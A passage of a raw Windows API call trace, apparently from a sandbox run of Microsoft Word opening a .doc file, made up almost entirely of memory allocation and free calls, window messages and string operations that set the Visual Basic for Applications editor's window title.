(This=0x7fefe015380, pv=0x76db340) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x76db540) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb4e3850) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x76db180) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x76db200) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x76db580) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb54c0f0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x7839e50) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x7837ae0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb420c50) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x7835ad0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb54b6a0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x7835b60) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x2e41460) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x7838fb0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb54b070) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x78388f0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x54f4870) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x54a0f70) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb4dce10) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4e0ec0) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4de3a0) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4ddf50) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4dd260) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4e01d0) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4de7f0) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb4e0620) [0129.157] IMalloc:Free (This=0x7fefe015380, pv=0xb40de70) [0129.157] VirtualFree (lpAddress=0x93a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x75dee30) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7668b20) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x763e620) [0129.158] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6970 [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6040) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7668af0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5b50) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7773e40) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb4fe930) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb490d70) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7668b50) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb490050) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7837930) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6970) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x777fad0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb4cf950) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x776c050) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x776c1d0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7837780) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb51cbb0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x7837a50) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb51bed0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x76689d0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb550e40) [0129.158] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fad0 [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6030) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0x76689a0) [0129.158] IMalloc:Free (This=0x7fefe015380, pv=0xb5a62d0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb5bb6f0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb51c560) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb495ad0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x7668a00) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb4903f0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x78378a0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x777fad0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x777fbc0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb4cfd30) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x71acb50) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x71ac850) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x776bf90) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x776c110) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0x78379c0) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb51ce20) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb514310) [0129.159] IMalloc:Free (This=0x7fefe015380, pv=0xb5118b0) [0129.159] VirtualFree (lpAddress=0xa510000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.160] VirtualFree (lpAddress=0xa520000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x734d370) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x76688e0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x7640660) [0129.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fbc0 [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6050) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x76688b0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5df0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0xb65e7d0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0xb511f40) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x72f72a0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x7668a30) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x774eda0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x7837c00) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x777fbc0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0x777faa0) [0129.160] IMalloc:Free (This=0x7fefe015380, pv=0xb5114d0) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7667260) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7667f20) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x776c290) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x776c350) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7837b70) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb521550) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x756fea0) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb512970) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7668790) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x2e43480) [0129.161] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777faa0 [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6090) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7668730) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7668670) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb513000) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x76687c0) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490130) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7837d20) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x777faa0) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6070) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb512590) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce5e0) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce610) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb51d580) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb51d640) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0x7837c90) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb5231d0) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb476360) [0129.161] IMalloc:Free (This=0x7fefe015380, pv=0xb5224f0) [0129.161] VirtualFree (lpAddress=0x9d00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x75df030) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x765d130) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x7668610) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x763ee30) [0129.162] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6070 [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60b0) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x76685e0) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb5a3810) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x7776060) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb522b80) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x7668640) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb490410) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x7837e40) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6070) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6060) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb513930) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce5b0) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce580) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb51d700) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb51d7c0) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x7837db0) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb528720) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0x7837ff0) [0129.162] IMalloc:Free (This=0x7fefe015380, pv=0xb527a40) [0129.162] VirtualFree (lpAddress=0x9cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x75df070) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x7668580) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb54b280) [0129.163] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6060 [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60d0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x76684f0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x7668490) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb5280d0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x7668850) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4904f0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x7837f60) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6060) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6080) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb523a70) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb51d940) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb51da00) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0x7837ed0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb5299f0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb52c8e0) [0129.163] IMalloc:Free (This=0x7fefe015380, pv=0xb528d10) [0129.163] VirtualFree (lpAddress=0x9e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.163] VirtualFree (lpAddress=0x9d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.164] VirtualFree (lpAddress=0x9d20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.164] VirtualFree (lpAddress=0x9d50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.165] VirtualFree (lpAddress=0x9d60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.165] VirtualFree (lpAddress=0x9d70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.166] VirtualFree (lpAddress=0x9d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.166] VirtualFree (lpAddress=0x9d90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.167] VirtualFree (lpAddress=0x9db0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.167] VirtualFree (lpAddress=0x9dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.168] VirtualFree (lpAddress=0x9dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.168] VirtualFree (lpAddress=0x9de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.169] VirtualFree (lpAddress=0x9df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.169] VirtualFree (lpAddress=0x9e00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.170] VirtualFree (lpAddress=0x9f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.170] VirtualFree (lpAddress=0xa500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.171] IMalloc:Free (This=0x7fefe015380, pv=0xb545f80) [0129.171] IMalloc:Free (This=0x7fefe015380, pv=0x7668430) [0129.171] IMalloc:Free (This=0x7fefe015380, pv=0xb62d340) [0129.172] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f7220 [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60f0) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0x7668400) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0x2d13310) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb5293a0) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0x76686d0) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb490510) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0x78381a0) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb4f7220) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60a0) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb523e60) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb51d880) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0xb51dac0) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0x7838080) [0129.172] IMalloc:Free (This=0x7fefe015380, pv=0x76d9680) [0129.172] wcsncpy_s (in: _Destination=0x2e6e30, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0129.172] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0129.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6d60, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0129.172] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0129.172] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0129.174] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6830 [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb4f63e0) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x7667620) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb5a7cb0) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb50c750) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x7667800) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb490cd0) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x7838980) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6830) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6220) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb524640) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb51e180) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x774bbe0) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x774bd20) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x7773d60) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6850) [0129.174] IMalloc:Free (This=0x7fefe015380, pv=0x76db140) [0129.175] IMalloc:Free (This=0x7fefe015380, pv=0xb4c74f0) [0129.175] IMalloc:Free (This=0x7fefe015380, pv=0xb4c7440) [0129.200] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x14b, wParam=0x0, lParam=0x0) returned 0x1 [0129.200] SendMessageA (hWnd=0x10238, Msg=0x184, wParam=0x0, lParam=0x0) returned 0x0 [0129.200] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x10238, Msg=0x184, wParam=0x0, lParam=0x0) returned 0x0 [0129.200] CallWindowProcA (lpPrevWndFunc=0xffff022d, hWnd=0x1023c, Msg=0xc, wParam=0x0, lParam=0x7fee3aa79b0) returned 0x1 [0129.200] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x111, wParam=0x4001004, lParam=0x1023c) returned 0x0 [0129.200] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x111, wParam=0x3001004, lParam=0x1023c) returned 0x0 [0129.200] IsWindowVisible (hWnd=0x1022e) returned 0 [0129.200] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0xc, wParam=0x0, lParam=0x93b9930) returned 0x1 [0129.200] GetWindowRect (in: hWnd=0x10236, lpRect=0x2e71c0 | out: lpRect=0x2e71c0) returned 1 [0129.200] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x1022e, lpPoints=0x2e71c0, cPoints=0x2 | out: lpPoints=0x2e71c0) returned -3080200 [0129.200] GetDC (hWnd=0x1022e) returned 0x2e010ad8 [0129.200] InflateRect (in: lprc=0x2e71b0, dx=-1, dy=-1 | out: lprc=0x2e71b0) returned 1 [0129.200] GetSysColor (nIndex=15) returned 0xf0f0f0 [0129.200] SetBkColor (hdc=0x2e010ad8, color=0xf0f0f0) returned 0xffffff [0129.200] ExtTextOutA (hdc=0x2e010ad8, x=2, y=58, options=0x6, lprect=0x2e71b0, lpString="", c=0x0, lpDx=0x0) returned 1 [0129.200] ReleaseDC (hWnd=0x1022e, hDC=0x2e010ad8) returned 1 [0129.201] IsWindowVisible (hWnd=0x1022e) returned 0 [0129.201] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0129.201] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0129.247] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1102, wParam=0x1, lParam=0x780cfc0) returned 0x0 [0129.247] IMalloc:Free (This=0x7fefe015380, pv=0xb46eab0) [0129.247] IUnknown:Release (This=0x778f620) returned 0x2 [0129.248] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0129.248] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0129.248] lstrlenA (lpString="Normal") returned 6 [0129.248] strcpy_s (in: _Dst=0x2ec2b0, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0129.248] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0129.248] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0129.248] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0129.248] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2ec2b0) returned 0x0 [0129.248] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1102, wParam=0x1, lParam=0x780cfc0) returned 0x0 [0129.248] CExposedDocFile::Release () returned 0x2 [0129.248] CExposedDocFile::Release () returned 0x1 [0129.249] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0129.249] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0129.249] lstrlenA (lpString="Normal") returned 6 [0129.249] strcpy_s (in: _Dst=0x2ec250, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0129.249] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0129.249] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0129.249] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0129.249] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2ec250) returned 0x0 [0129.249] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1102, wParam=0x1, lParam=0x780cfc0) returned 0x0 [0129.249] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6840) [0129.249] IMalloc:Free (This=0x7fefe015380, pv=0x76db2c0) [0129.249] IMalloc:Free (This=0x7fefe015380, pv=0x7773c80) [0129.250] SetCursor (hCursor=0x10007) returned 0x10007 [0129.250] CExposedDocFile::Release () returned 0x0 [0129.250] CExposedDocFile::Release () returned 0x0 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780cf00) returned 0x780cf60 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780cf00) returned 0x1 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2ec760) returned 0x1 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cf60) returned 0x0 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780cf60) returned 0x1 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cfc0) returned 0x0 [0129.250] SendMessageA (hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780cfc0) returned 0x1 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780cfc0) returned 0x1 [0129.250] SendMessageA (hWnd=0x1022a, Msg=0x1105, wParam=0x0, lParam=0x0) returned 0x0 [0129.250] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1105, wParam=0x0, lParam=0x0) returned 0x0 [0129.250] strcpy_s (in: _Dst=0x2ec570, _DstSize=0x208, _Src="No Open Projects" | out: _Dst="No Open Projects") returned 0x0 [0129.250] lstrcpyA (in: lpString1=0x2ec360, lpString2="Project" | out: lpString1="Project") returned="Project" [0129.250] lstrcatA (in: lpString1="Project", lpString2=" - " | out: lpString1="Project - ") returned="Project - " [0129.250] lstrcatA (in: lpString1="Project - ", lpString2="No Open Projects" | out: lpString1="Project - No Open Projects") returned="Project - No Open Projects" [0129.250] SetWindowTextA (hWnd=0x10228, lpString="Project - No Open Projects") returned 1 [0129.250] IsWindowVisible (hWnd=0x10228) returned 0 [0129.250] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0xc, wParam=0x0, lParam=0x2ec360) returned 0x1 [0129.250] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0129.250] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0129.251] lstrlenA (lpString="Normal") returned 6 [0129.251] strcpy_s (in: _Dst=0x2ec370, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0129.251] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0129.251] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0129.251] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0129.251] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2ec370) returned 0x0 [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7773eb0) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x76db740) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x76db700) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x76db6c0) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x76db680) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x76db640) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7838740) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4db430) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4dbcd0) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4dc570) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4dc120) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4dc9c0) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb52ba80) [0129.251] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6840 [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6380) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7667830) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7667a70) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7773dd0) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb502d50) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0xb490d10) [0129.251] IMalloc:Free (This=0x7fefe015380, pv=0x7667a10) [0129.251] IMalloc:Free 